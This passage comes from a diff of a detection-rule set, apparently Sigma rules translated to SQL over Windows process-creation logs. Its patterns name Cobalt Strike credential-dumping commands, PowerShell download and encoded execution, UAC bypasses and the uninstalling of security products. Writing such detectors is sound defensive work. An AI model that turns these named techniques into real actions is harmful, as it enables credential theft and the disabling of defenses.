ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '% 936' ESCAPE '\\' OR CommandLine LIKE '% 1258' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" + "filename": "proc_creation_win_chcp_codepage_switch.yml" }, { - "title": "Raccine Uninstall", - "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "title": "MpiExec Lolbin", + "id": "729ce0ea-5d8f-4769-9762-e35de441586d", "status": "test", - "description": "Detects commands that indicate a Raccine removal from an end system. 
Raccine is a free ransomware protection tool.", + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate deinstallation by administrative staff" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_disable_raccine.yml" + "filename": "proc_creation_win_lolbin_mpiexec.yml" }, { - "title": "WmiPrvSE Spawned A Process", - "id": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", - "status": "stable", - "description": "Detects wmiprvse spawning processes", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Active Directory Database Snapshot Via ADExplorer", + "id": "9212f354-7775-4e28-9c9f-8f0a4544e664", + "status": "experimental", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", 
- "attack.t1047" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\WmiPrvSe.exe' ESCAPE '\\' AND NOT ((SubjectLogonId IN ('0x3e7', 'null') OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\')) OR (SubjectLogonId = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmiprvse_spawning_process.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_execution.yml" }, { - "title": "Potential Suspicious Child Process Of 3CXDesktopApp", - "id": "63f3605b-979f-48c2-b7cc-7f90523fed88", + "title": "Suspicious Execution of Powershell with Base64", + "id": "fb843269-508c-4b76-8b8d-88679db22ce7", "status": "experimental", - "description": "Detects potential suspicious child processes of \"3CXDesktopApp.exe\". 
Which could be related to the 3CXDesktopApp supply chain compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Commandline to launch powershell with a base64 payload", + "author": "frack113", "tags": [ - "attack.command_and_control", "attack.execution", - "attack.t1218" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% -Encoding %' ESCAPE '\\') OR ((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_children.yml" + "filename": "proc_creation_win_powershell_encode.yml" }, { - "title": "Modify Group Policy Settings", - "id": "ada4b0c4-758b-46ac-9033-9004613a150d", + "title": "Sysinternals PsSuspend Execution", + "id": "48bbc537-b652-4b4e-bd1d-281172df448f", "status": "experimental", - 
"description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", - "author": "frack113", + "description": "Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484.001" + "attack.discovery", + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (CommandLine LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR CommandLine LIKE '%EnableSmartScreen%' ESCAPE '\\' OR CommandLine LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'pssuspend.exe' OR (NewProcessName LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_modify_group_policy_settings.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_execution.yml" }, { - "title": "Run PowerShell Script from Redirected Input Stream", - "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", - "status": "test", - "description": "Detects PowerShell script execution via input stream redirect", - "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", + "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", + "id": "0d5675be-bc88-4172-86d3-1e96a4476536", + "status": "experimental", + 
"description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.lateral_movement", + "attack.t1021.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" + "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" }, { - "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", - "id": 
"074e0ded-6ced-4ebd-8b4d-53f55908119d", + "title": "Regsvr32 Flags Anomaly", + "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", "status": "test", - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "author": "Julia Fomina, oscd.community", + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1218.010" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%winrm%' ESCAPE '\\' AND (CommandLine LIKE '%format:pretty%' ESCAPE '\\' OR CommandLine LIKE '%format:\"pretty\"%' ESCAPE '\\' OR CommandLine LIKE '%format:\"text\"%' ESCAPE '\\' OR CommandLine LIKE '%format:text%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winrm_awl_bypass.yml" + "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" }, { - "title": "Execute From Alternate Data Streams", - "id": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", - "status": "test", - "description": "Detects execution from an Alternate Data Stream (ADS). 
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", + "title": "Change PowerShell Policies to an Insecure Level", + "id": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", + "status": "experimental", + "description": "Detects use of executionpolicy option to set insecure policies", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrator script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%txt:%' ESCAPE '\\' AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\') OR (CommandLine LIKE '%makecab %' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '% export %' ESCAPE '\\') OR (CommandLine LIKE '%regedit %' ESCAPE '\\' AND CommandLine LIKE '% /E %' ESCAPE '\\') OR (CommandLine LIKE '%esentutl %' ESCAPE '\\' AND CommandLine LIKE '% /y %' ESCAPE '\\' AND CommandLine LIKE '% /d %' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -executionpolicy %' ESCAPE '\\' OR CommandLine LIKE '% -ep %' ESCAPE '\\' OR CommandLine LIKE '% -exec %' ESCAPE '\\') AND (CommandLine LIKE '%Unrestricted%' ESCAPE '\\' OR CommandLine LIKE '%bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_alternate_data_streams.yml" + "filename": "proc_creation_win_powershell_set_policies_to_unsecure_level.yml" }, { - "title": "Suspicious Csi.exe Usage", - "id": "40b95d31-1afc-469e-8d34-9a3a667d058e", - "status": 
"experimental", - "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", - "author": "Konstantin Grishchenko, oscd.community", + "title": "DLL Execution Via Register-cimprovider.exe", + "id": "a2910908-e86f-4687-aeba-76a5f996e652", + "status": "test", + "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", + "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", "tags": [ - "attack.execution", - "attack.t1072", "attack.defense_evasion", - "attack.t1218" + "attack.t1574" ], "falsepositives": [ - "Legitimate usage by software developers" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rcsi.exe' ESCAPE '\\') OR OriginalFileName IN ('csi.exe', 'rcsi.exe')) AND Company = 'Microsoft Corporation')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\register-cimprovider.exe' ESCAPE '\\' AND CommandLine LIKE '%-path%' ESCAPE '\\' AND CommandLine LIKE '%dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_csi_execution.yml" + "filename": "proc_creation_win_registry_cimprovider_dll_load.yml" }, { - "title": "Potential RDP Session Hijacking Activity", - "id": "224f140f-3553-4cd1-af78-13d81bf9f7cc", + "title": "Obfuscated IP Download", + "id": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", "status": "experimental", - "description": "Detects potential RDP Session Hijacking activity on Windows systems", - "author": "@juju4", + "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) 
in an URL combined with a download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.discovery" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\' OR OriginalFileName = 'tscon.exe') AND IntegrityLevel = 'SYSTEM')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\') AND ((CommandLine LIKE '%//0x%' ESCAPE '\\' OR CommandLine LIKE '%.0x%' ESCAPE '\\' OR CommandLine LIKE '%.00x%' ESCAPE '\\') OR (CommandLine LIKE '%http://\\%%' ESCAPE '\\' AND CommandLine LIKE '%\\%2e%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_tscon_rdp_session_hijacking.yml" + "filename": "proc_creation_win_susp_obfuscated_ip_download.yml" }, { - "title": "UAC Bypass Using Disk Cleanup", - "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", - "status": "test", - "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Regsvr32 Spawning Explorer", + "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", + "status": "experimental", + "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", + "author": "elhoim", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE 
'\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" + "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" }, { - "title": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)", - "id": "a58353df-af43-4753-bad0-cd83ef35eef5", + "title": "Use of Adplus.exe", + "id": "2f869d59-7f6a-4931-992c-cce556ff2d53", "status": "experimental", - "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", + "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.execution", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate usage to restore snapshots", - "Legitimate admin activity" + "Legitimate usage of Adplus" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR OriginalFileName = 'ntdsutil.exe') AND ((CommandLine LIKE '%snapshot%' ESCAPE '\\' AND CommandLine LIKE '%mount %' ESCAPE '\\') OR (CommandLine LIKE '%ac%' ESCAPE '\\' AND CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% ntds%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\adplus.exe' ESCAPE '\\' OR OriginalFileName = 'Adplus.exe') AND (CommandLine LIKE '% -hang %' ESCAPE '\\' OR CommandLine LIKE '% -pn %' ESCAPE '\\' OR CommandLine LIKE '% -pmn %' 
ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -po %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -sc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ntdsutil_susp_usage.yml" + "filename": "proc_creation_win_lolbin_adplus.yml" }, { - "title": "Potential Defense Evasion Via Right-to-Left Override", - "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", - "status": "experimental", - "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", - "author": "Micah Babinski, @micahbabinski", + "title": "Suspicious VBoxDrvInst.exe Parameters", + "id": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", + "status": "test", + "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036.002" + "attack.t1112" ], "falsepositives": [ - "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" + "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%‮%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\VBoxDrvInst.exe' ESCAPE '\\' AND CommandLine LIKE '%driver%' ESCAPE '\\' AND CommandLine LIKE '%executeinf%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_right_to_left_override.yml" + "filename": "proc_creation_win_virtualbox_vboxdrvinst_execution.yml" }, { - 
"title": "UAC Bypass Using IEInstal - Process", - "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "title": "Potential Tampering With Security Products Via WMIC", + "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects uninstallation or termination of security products using the WMIC utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' 
OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_ieinstal.yml" + "filename": "proc_creation_win_wmic_uninstall_security_products.yml" }, { - "title": "PowerShell DownloadFile", - "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", - "status": "test", - "description": "Detects the execution of powershell, a 
WebClient object creation and the invocation of DownloadFile in a single command line", - "author": "Florian Roth (Nextron Systems)", + "title": "Computer Password Change Via Ksetup.EXE", + "id": "de16d92c-c446-4d53-8938-10aeef41c8b6", + "status": "experimental", + "description": "Detects password change for the computer's domain account or host principal via \"ksetup.exe\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1104", - "attack.t1105" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ksetup.exe' ESCAPE '\\' OR OriginalFileName = 'ksetup.exe') AND CommandLine LIKE '% /setcomputerpassword %' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" + "filename": "proc_creation_win_ksetup_password_change_computer.yml" }, { - "title": "Formbook Process Creation", - "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", - "status": "test", - "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. 
